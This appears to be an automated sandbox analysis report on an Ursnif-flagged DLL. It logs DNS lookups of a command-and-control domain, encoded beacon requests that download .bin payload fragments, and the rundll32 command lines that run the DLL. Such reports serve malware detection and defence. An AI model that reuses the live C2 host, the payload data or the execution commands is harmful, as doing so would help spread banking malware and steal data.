Jul 28, 2021 13:47:45.148981094 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.149003029 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.149034977 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.149074078 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152189016 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152216911 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152229071 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152360916 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152463913 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152496099 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152508974 CEST	49741	80	192.168.2.4	185.228.233.17

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 28, 2021 13:45:59.399903059 CEST	53097	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:45:59.425240993 CEST	53	53097	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:02.806834936 CEST	49257	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:02.828219891 CEST	53	49257	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:03.942423105 CEST	62389	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:03.968888044 CEST	53	62389	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:05.123039961 CEST	49910	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:05.146550894 CEST	53	49910	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:06.008549929 CEST	55854	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:06.030251026 CEST	53	55854	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:06.895272017 CEST	64549	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:06.915939093 CEST	53	64549	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:55.923141956 CEST	63153	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:55.950819016 CEST	53	63153	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:14.710267067 CEST	52991	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:14.731111050 CEST	53	52991	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:15.306786060 CEST	53700	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:15.329476118 CEST	53	53700	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:42.312607050 CEST	51726	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:42.339160919 CEST	53	51726	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:44.065171003 CEST	56794	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:44.342845917 CEST	53	56794	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:52.480674982 CEST	56534	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:52.502660036 CEST	53	56534	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:58.609726906 CEST	56627	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:58.637411118 CEST	53	56627	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:00.934286118 CEST	56621	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:00.962090015 CEST	53	56621	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:12.225994110 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:12.258085012 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:13.233498096 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:13.265110016 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:13.276761055 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:13.300801039 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:13.722744942 CEST	64801	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:13.807629108 CEST	53	64801	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:14.245825052 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:14.268208981 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:14.292480946 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:14.316703081 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:14.830348969 CEST	61721	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:14.903963089 CEST	53	61721	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:15.310137987 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:15.332660913 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:15.392132998 CEST	51255	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:15.487905025 CEST	53	51255	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:16.207978964 CEST	61522	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:16.231252909 CEST	53	61522	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:16.262177944 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:16.284215927 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:17.067504883 CEST	52337	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:17.091561079 CEST	53	52337	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:17.308420897 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:17.333807945 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:17.476437092 CEST	55046	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:17.500547886 CEST	53	55046	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:17.915119886 CEST	49612	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:17.992162943 CEST	53	49612	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:18.553750038 CEST	49285	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:18.574872971 CEST	53	49285	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:19.200534105 CEST	50601	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:19.221684933 CEST	53	50601	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:19.639708996 CEST	60875	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:19.660656929 CEST	53	60875	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 28, 2021 13:47:44.065171003 CEST	192.168.2.4	8.8.8.8	0xd71f	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 28, 2021 13:47:58.609726906 CEST	192.168.2.4	8.8.8.8	0xf468	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 28, 2021 13:47:14.731111050 CEST	8.8.8.8	192.168.2.4	0x2077	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jul 28, 2021 13:47:44.342845917 CEST	8.8.8.8	192.168.2.4	0xd71f	No error (0)	gtr.antoinfer.com		185.228.233.17	A (IP address)	IN (0x0001)
Jul 28, 2021 13:47:58.637411118 CEST	8.8.8.8	192.168.2.4	0xf468	No error (0)	gtr.antoinfer.com		185.228.233.17	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gtr.antoinfer.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49741	185.228.233.17	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 28, 2021 13:47:44.437294960 CEST	1474	OUT	GET /02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 28, 2021 13:47:44.984083891 CEST	1476	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Jul 2021 11:47:44 GMT Content-Type: application/octet-stream Content-Length: 258248 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="610143e0e072b.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 62 59 6d 32 79 69 72 74 51 6a 31 39 52 39 42 54 49 7a 4a 76 55 32 6f 59 51 2b 58 4a 77 67 77 49 50 4a 6a 72 35 56 72 36 45 47 74 58 4a 72 79 62 38 4b 55 53 65 6d 77 45 6e 31 70 6e 76 39 70 7a 6d 56 34 44 66 2b 41 69 5a 55 30 42 49 45 30 31 67 75 6c 4e 30 61 5a 4d 36 4a 69 37 64 6e 7a 51 78 32 4a 5a 7a 65 33 37 61 4c 79 59 39 4f 78 74 75 44 6b 46 62 6c 55 52 44 63 42 75 7a 49 38 77 4f 62 79 64 53 6e 65 53 34 47 39 39 6e 5a 79 4b 33 4a 54 63 79 59 79 56 65 4d 48 64 6e 56 46 59 66 49 52 4b 45 57 4e 44 52 4f 45 68 48 75 2f 75 41 58 5a 78 2f 4d 72 61 35 57 73 52 6a 4f 70 34 2b 2f 37 55 52 30 70 37 42 33 61 39 4a 2f 76 78 55 74 64 41 42 4c 73 43 78 67 49 59 44 31 69 65 61 6a 71 6d 59 43 2b 2f 4d 34 72 32 4f 58 30 4d 54 53 48 7a 6e 2f 4c 6b 6d 39 73 33 2b 47 6c 53 30 49 76 61 68 74 38 4d 31 6c 51 44 38 79 64 4e 64 57 67 45 6d 32 71 70 48 57 64 6a 4c 65 73 72 70 34 6d 70 47 68 58 32 6e 7a 56 46 4f 61 65 73 50 46 73 73 75 33 44 4a 47 46 72 50 7a 5a 55 2f 42 35 79 34 41 30 62 75 67 57 57 77 71 32 31 46 59 31 4c 71 70 36 6a 36 78 64 30 7a 63 73 4a 4f 61 58 56 73 68 55 4a 4a 63 4d 4c 2f 35 71 59 77 53 2b 77 52 59 57 55 69 6f 39 4e 37 6b 32 59 70 66 4d 45 59 76 64 64 39 62 46 61 50 37 68 54 43 63 2b 2f 38 35 5a 32 6c 78 39 44 4b 30 34 6c 71 77 30 44 45 48 32 6a 36 41 45 70 46 51 6b 55 47 48 37 79 57 62 75 6b 73 74 37 6d 59 31 32 57 39 6f 67 48 5a 57 32 65 6b 61 71 7a 49 73 75 48 7a 4d 71 50 2b 6b 69 34 75 58 74 63 32 66 70 39 63 66 42 75 71 64 68 54 51 41 74 43 4f 69 74 48 74 69 48 56 67 30 7a 39 74 75 36 33 32 47 6e 55 66 6b 4f 6c 74 6c 2b 67 42 63 75 32 50 61 74 37 6f 67 4c 56 56 57 2b 71 7a 64 61 4f 5a 62 67 62 56 51 42 62 43 75 2b 50 6a 44 4c 53 2b 6f 44 39 61 31 58 32 33 74 42 59 6e 41 68 67 68 76 4a 6a 65 4f 46 38 32 4a 53 6a 4a 66 2b 31 51 39 5a 31 5a 4c 30 57 44 59 30 4b 73 33 35 45 34 53 4e 31 72 53 4f 42 73 44 46 70 4f 71 50 7a 69 68 76 33 73 66 63 52 48 51 4f 71 79 63 78 70 35 44 62 2b 50 71 61 6e 39 69 6d 49 2b 53 64 69 63 6f 70 56 6c 66 6e 59 52 75 5a 32 36 5a 4d 63 63 5a 2f 43 37 44 77 39 7a 41 76 36 74 54 71 7a 58 59 56 6c 71 6d 55 76 56 6f 61 30 4e 55 64 76 79 64 4f 56 44 67 37 63 54 32 33 66 4f 6c 50 4d 37 63 4c 30 6d 42 6d 4d 68 4b 77 33 55 30 6e 42 52 6a 6c 66 30 2b 77 6e 4a 5a 59 6b 50 2b 46 43 61 4c 48 53 31 35 4f 56 6c 67 63 34 4f 4d 34 4b 6c 2b 6e 65 2b 76 4e 46 57 51 79 4f 5a 50 53 39 76 58 6b 2b 73 37 5a 6a 66 46 45 73 35 4d 45 52 50 6f 75 74 70 58 33 39 73 42 54 45 2b 64 53 4b 36 58 74 35 69 74 77 62 62 79 58 72 6c 35 47 76 58 39 33 76 6a 42 74 41 72 31 62 32 73 47 67 50 4d 2f 71 5a 76 44 42 2b 38 66 74 38 6b 46 42 73 37 61 75 6f 61 5a 4d 69 75 61 2b 78 71 6b 71 73 38 67 65 66 44 39 2f 6a 48 2f 59 47 56 34 4f 76 4f 35 4f 63 63 62 6c 54 5a 42 36 78 39 31 49 52 74 4b 34 4b 50 49 75 75 Data Ascii: bYm2yirtQj19R9BTIzJvU2oYQ+XJwgwIPJjr5Vr6EGtXJryb8KUSemwEn1pnv9pzmV4Df+AiZU0BIE01gulN0aZM6Ji7dnzQx2JZze37aLyY9OxtuDkFblURDcBuzI8wObydSneS4G99nZyK3JTcyYyVeMHdnVFYfIRKEWNDROEhHu/uAXZx/Mra5WsRjOp4+/7UR0p7B3a9J/vxUtdABLsCxgIYD1ieajqmYC+/M4r2OX0MTSHzn/Lkm9s3+GlS0Ivaht8M1lQD8ydNdWgEm2qpHWdjLesrp4mpGhX2nzVFOaesPFssu3DJGFrPzZU/B5y4A0bugWWwq21FY1Lqp6j6xd0zcsJOaXVshUJJcML/5qYwS+wRYWUio9N7k2YpfMEYvdd9bFaP7hTCc+/85Z2lx9DK04lqw0DEH2j6AEpFQkUGH7yWbukst7mY12W9ogHZW2ekaqzIsuHzMqP+ki4uXtc2fp9cfBuqdhTQAtCOitHtiHVg0z9tu632GnUfkOltl+gBcu2Pat7ogLVVW+qzdaOZbgbVQBbCu+PjDLS+oD9a1X23tBYnAhghvJjeOF82JSjJf+1Q9Z1ZL0WDY0Ks35E4SN1rSOBsDFpOqPzihv3sfcRHQOqycxp5Db+Pqan9imI+SdicopVlfnYRuZ26ZMccZ/C7Dw9zAv6tTqzXYVlqmUvVoa0NUdvydOVDg7cT23fOlPM7cL0mBmMhKw3U0nBRjlf0+wnJZYkP+FCaLHS15OVlgc4OM4Kl+ne+vNFWQyOZPS9vXk+s7ZjfFEs5MERPoutpX39sBTE+dSK6Xt5itwbbyXrl5GvX93vjBtAr1b2sGgPM/qZvDB+8ft8kFBs7auoaZMiua+xqkqs8gefD9/jH/YGV4OvO5OccblTZB6x91IRtK4KPIuu

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49746	185.228.233.17	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 28, 2021 13:47:58.751058102 CEST	1841	OUT	GET /mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 28, 2021 13:47:59.292139053 CEST	1842	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Jul 2021 11:47:59 GMT Content-Type: application/octet-stream Content-Length: 258248 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="610143ef37a40.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 62 59 6d 32 79 69 72 74 51 6a 31 39 52 39 42 54 49 7a 4a 76 55 32 6f 59 51 2b 58 4a 77 67 77 49 50 4a 6a 72 35 56 72 36 45 47 74 58 4a 72 79 62 38 4b 55 53 65 6d 77 45 6e 31 70 6e 76 39 70 7a 6d 56 34 44 66 2b 41 69 5a 55 30 42 49 45 30 31 67 75 6c 4e 30 61 5a 4d 36 4a 69 37 64 6e 7a 51 78 32 4a 5a 7a 65 33 37 61 4c 79 59 39 4f 78 74 75 44 6b 46 62 6c 55 52 44 63 42 75 7a 49 38 77 4f 62 79 64 53 6e 65 53 34 47 39 39 6e 5a 79 4b 33 4a 54 63 79 59 79 56 65 4d 48 64 6e 56 46 59 66 49 52 4b 45 57 4e 44 52 4f 45 68 48 75 2f 75 41 58 5a 78 2f 4d 72 61 35 57 73 52 6a 4f 70 34 2b 2f 37 55 52 30 70 37 42 33 61 39 4a 2f 76 78 55 74 64 41 42 4c 73 43 78 67 49 59 44 31 69 65 61 6a 71 6d 59 43 2b 2f 4d 34 72 32 4f 58 30 4d 54 53 48 7a 6e 2f 4c 6b 6d 39 73 33 2b 47 6c 53 30 49 76 61 68 74 38 4d 31 6c 51 44 38 79 64 4e 64 57 67 45 6d 32 71 70 48 57 64 6a 4c 65 73 72 70 34 6d 70 47 68 58 32 6e 7a 56 46 4f 61 65 73 50 46 73 73 75 33 44 4a 47 46 72 50 7a 5a 55 2f 42 35 79 34 41 30 62 75 67 57 57 77 71 32 31 46 59 31 4c 71 70 36 6a 36 78 64 30 7a 63 73 4a 4f 61 58 56 73 68 55 4a 4a 63 4d 4c 2f 35 71 59 77 53 2b 77 52 59 57 55 69 6f 39 4e 37 6b 32 59 70 66 4d 45 59 76 64 64 39 62 46 61 50 37 68 54 43 63 2b 2f 38 35 5a 32 6c 78 39 44 4b 30 34 6c 71 77 30 44 45 48 32 6a 36 41 45 70 46 51 6b 55 47 48 37 79 57 62 75 6b 73 74 37 6d 59 31 32 57 39 6f 67 48 5a 57 32 65 6b 61 71 7a 49 73 75 48 7a 4d 71 50 2b 6b 69 34 75 58 74 63 32 66 70 39 63 66 42 75 71 64 68 54 51 41 74 43 4f 69 74 48 74 69 48 56 67 30 7a 39 74 75 36 33 32 47 6e 55 66 6b 4f 6c 74 6c 2b 67 42 63 75 32 50 61 74 37 6f 67 4c 56 56 57 2b 71 7a 64 61 4f 5a 62 67 62 56 51 42 62 43 75 2b 50 6a 44 4c 53 2b 6f 44 39 61 31 58 32 33 74 42 59 6e 41 68 67 68 76 4a 6a 65 4f 46 38 32 4a 53 6a 4a 66 2b 31 51 39 5a 31 5a 4c 30 57 44 59 30 4b 73 33 35 45 34 53 4e 31 72 53 4f 42 73 44 46 70 4f 71 50 7a 69 68 76 33 73 66 63 52 48 51 4f 71 79 63 78 70 35 44 62 2b 50 71 61 6e 39 69 6d 49 2b 53 64 69 63 6f 70 56 6c 66 6e 59 52 75 5a 32 36 5a 4d 63 63 5a 2f 43 37 44 77 39 7a 41 76 36 74 54 71 7a 58 59 56 6c 71 6d 55 76 56 6f 61 30 4e 55 64 76 79 64 4f 56 44 67 37 63 54 32 33 66 4f 6c 50 4d 37 63 4c 30 6d 42 6d 4d 68 4b 77 33 55 30 6e 42 52 6a 6c 66 30 2b 77 6e 4a 5a 59 6b 50 2b 46 43 61 4c 48 53 31 35 4f 56 6c 67 63 34 4f 4d 34 4b 6c 2b 6e 65 2b 76 4e 46 57 51 79 4f 5a 50 53 39 76 58 6b 2b 73 37 5a 6a 66 46 45 73 35 4d 45 52 50 6f 75 74 70 58 33 39 73 42 54 45 2b 64 53 4b 36 58 74 35 69 74 77 62 62 79 58 72 6c 35 47 76 58 39 33 76 6a 42 74 41 72 31 62 32 73 47 67 50 4d 2f 71 5a 76 44 42 2b 38 66 74 38 6b 46 42 73 37 61 75 6f 61 5a 4d 69 75 61 2b 78 71 6b 71 73 38 67 65 66 44 39 2f 6a 48 2f 59 47 56 34 4f 76 4f 35 4f 63 63 62 6c 54 5a 42 36 78 39 31 49 52 74 4b 34 4b 50 49 75 75 Data Ascii: bYm2yirtQj19R9BTIzJvU2oYQ+XJwgwIPJjr5Vr6EGtXJryb8KUSemwEn1pnv9pzmV4Df+AiZU0BIE01gulN0aZM6Ji7dnzQx2JZze37aLyY9OxtuDkFblURDcBuzI8wObydSneS4G99nZyK3JTcyYyVeMHdnVFYfIRKEWNDROEhHu/uAXZx/Mra5WsRjOp4+/7UR0p7B3a9J/vxUtdABLsCxgIYD1ieajqmYC+/M4r2OX0MTSHzn/Lkm9s3+GlS0Ivaht8M1lQD8ydNdWgEm2qpHWdjLesrp4mpGhX2nzVFOaesPFssu3DJGFrPzZU/B5y4A0bugWWwq21FY1Lqp6j6xd0zcsJOaXVshUJJcML/5qYwS+wRYWUio9N7k2YpfMEYvdd9bFaP7hTCc+/85Z2lx9DK04lqw0DEH2j6AEpFQkUGH7yWbukst7mY12W9ogHZW2ekaqzIsuHzMqP+ki4uXtc2fp9cfBuqdhTQAtCOitHtiHVg0z9tu632GnUfkOltl+gBcu2Pat7ogLVVW+qzdaOZbgbVQBbCu+PjDLS+oD9a1X23tBYnAhghvJjeOF82JSjJf+1Q9Z1ZL0WDY0Ks35E4SN1rSOBsDFpOqPzihv3sfcRHQOqycxp5Db+Pqan9imI+SdicopVlfnYRuZ26ZMccZ/C7Dw9zAv6tTqzXYVlqmUvVoa0NUdvydOVDg7cT23fOlPM7cL0mBmMhKw3U0nBRjlf0+wnJZYkP+FCaLHS15OVlgc4OM4Kl+ne+vNFWQyOZPS9vXk+s7ZjfFEs5MERPoutpX39sBTE+dSK6Xt5itwbbyXrl5GvX93vjBtAr1b2sGgPM/qZvDB+8ft8kFBs7auoaZMiua+xqkqs8gefD9/jH/YGV4OvO5OccblTZB6x91IRtK4KPIuu

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	185.228.233.17	80	192.168.2.4	49740	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 28, 2021 13:48:14.519860983 CEST	8134	IN	HTTP/1.0 408 Request Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6608 Parent PID: 5920

General

Start time:	13:46:06
Start date:	28/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\mental.dll'
Imagebase:	0xc70000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: cmd.exe PID: 6624 Parent PID: 6608

General

Start time:	13:46:06
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 6632 Parent PID: 6608

General

Start time:	13:46:06
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\mental.dll,Behind
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 6644 Parent PID: 6624

General

Start time:	13:46:07
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exe PID: 6720 Parent PID: 6608

General

Start time:	13:46:11
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\mental.dll,Factpresent
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 6736 Parent PID: 6608

General

Start time:	13:46:15
Start date:	28/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\mental.dll,Steadunder
Imagebase:	0xc50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 5608 Parent PID: 800

General

Start time:	13:47:41
Start date:	28/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
